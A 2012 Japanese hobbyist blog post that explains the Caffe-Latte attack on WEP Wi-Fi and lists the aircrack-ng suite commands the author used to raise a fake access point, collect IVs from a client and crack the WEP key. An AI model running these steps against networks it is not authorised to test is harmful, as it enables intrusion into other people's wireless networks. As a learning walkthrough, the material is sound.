今さらながらCaffe-Latte攻撃について書いてみた   no comments

Posted at 3:19 pm in internet,Security,無線LAN

お久しぶりですこんにちは。なんだかWordPressのバージョンアップでできなくなってたビジュアル編集ができるようになってますね。

ということでしばらくこのブログも更新してなかったのでたまにはなんか書いてみようと言うことで、たしか書いてなかったWEPのcaffe-latteアタックでもやってみたのでメモ書きとして残しておきます。

ほとんどの人は興味ないと思いますし、もうさすがにWEPのAPなんかないだろうから、役に立たないこと請け合いですが、それでもいいという方やとりあえずオプションは全部試してみたい派の人は読んでみてもいいのではないでしょうか。

cats_2012-02-21_9

・Caffe-Latteアタックとは

詳しい話はよくわかんないのですが、WEPによってAPと正常に通信しているところに同名の偽APを立てて、かすめ取った正常な通信を使って偽APとクライアントでゴニョゴニョやることで、APに対して攻撃パケットを送ることもなく、そのままじっと我慢しているよりは早くIVを集められるよという中途半端な攻撃です。間違ってたらごめんなさい。

・試してみる

能書きはともかく試してみることにします。とりあえず今回はBT5とアダプタはPCに刺さってたAterm WL54G(Atheros5X系)を使っていますが、airmon-ngでmon0になるならなんでもいいんじゃないでしょうか(無責任)
他にもちろんWEPのAPとそこにちゃんとアクセスしている別のクライアントが必要になります。

まずはお約束ですが

# airmon-ng start wlan0

でモニタモードにします。

次に、ターゲットになるAPのMACアドレスを取得します。

# airodump -i mon0

ターゲットが決まったら、いったん止めてそのAPのパケットだけ保存するようにします。


# airodump -i mon0 -c 1 -w cafe

次に別ターミナルを開いて攻撃APを立ち上げます。


# airbase-ng -c 1 -a ターゲットのBSSID -e "ターゲットのessid" -L -W 1 mon0

これでしばらく待ちます。
次にWEPのパスワードをクラックされるAPとクライアントが通信すると
いろいろはじまってCaffe-Latte攻撃が始まります。

cafe-latteアタック

ある程度IVがたまったら、クラックします。


# aircrack-ng cafe-01.ivs

クラックも成功

クラックできました(゚д゚)ウマー

他に似たような攻撃としてHiret攻撃もありますが、基本的にオプションが違うだけなので、そちらも試してみて下さいませ。

Written by bogus on 2月 23rd, 2012

Tagged with ,